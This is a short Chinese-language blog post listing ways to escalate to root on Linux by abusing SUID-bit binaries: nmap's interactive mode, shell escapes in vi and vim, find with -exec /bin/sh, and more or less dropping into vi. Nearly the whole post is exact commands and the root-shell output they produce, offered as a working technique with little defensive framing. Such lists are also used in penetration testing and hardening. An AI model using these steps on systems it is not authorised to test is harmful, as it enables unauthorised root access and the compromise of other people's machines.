帶有SUID許可權位的提權方法
阿新 • • 發佈:2018-12-07
在Linux中有幾個檔案,一旦具備suid許可權位,將可以被用來進行提權,分別是:Nmap Vi Vim find More Less
一、nmap
nmap在2.02-5.21之間的版本存在一個互動模式,這個模式允許使用者執行shell命令,具體操作方式如下
1、首先進入互動模式
[email protected]:$nmap --interactive nmap>
2、通過互動模式進入shell:輸入!sh
nmap>!sh sh-3.2#
二、Vi
1、啟動Vi在命令模式輸入以下內容
:!sh
sh-3.2#
這樣可以直接進入root許可權的shell模式
三、Vim
1、啟動Vim在命令模式下輸入以下內容
:set shell=/bin/sh :shell
這樣就可以直接進入root許可權的shell模式
四、find
find命令有一個-exec引數,這個引數用於:“當找到對應的檔案後,執行一個系統命令進行處理該檔案”,可以被用來進行提權
[email protected]:$touch test #確保可以找到該檔案 [email protected]:$find test -exec "/bin/sh" \; [email protected]:#
五、more/less
more和less可以被用來進行提權的一個重要因素在於可以從這兩個命令裡進入vim/vi模式
1、先通過more開啟一個檔案
[email protected]:$more testfile
2、這個時候可以按一下鍵盤上的 ‘v’,便可以呼叫Vim/Vi進入編輯模式,這個時候就可以通過vim進行提權,全程都是root許可權:命令模式下輸入“!sh”就可以獲取一個root的shell。參考第二、三條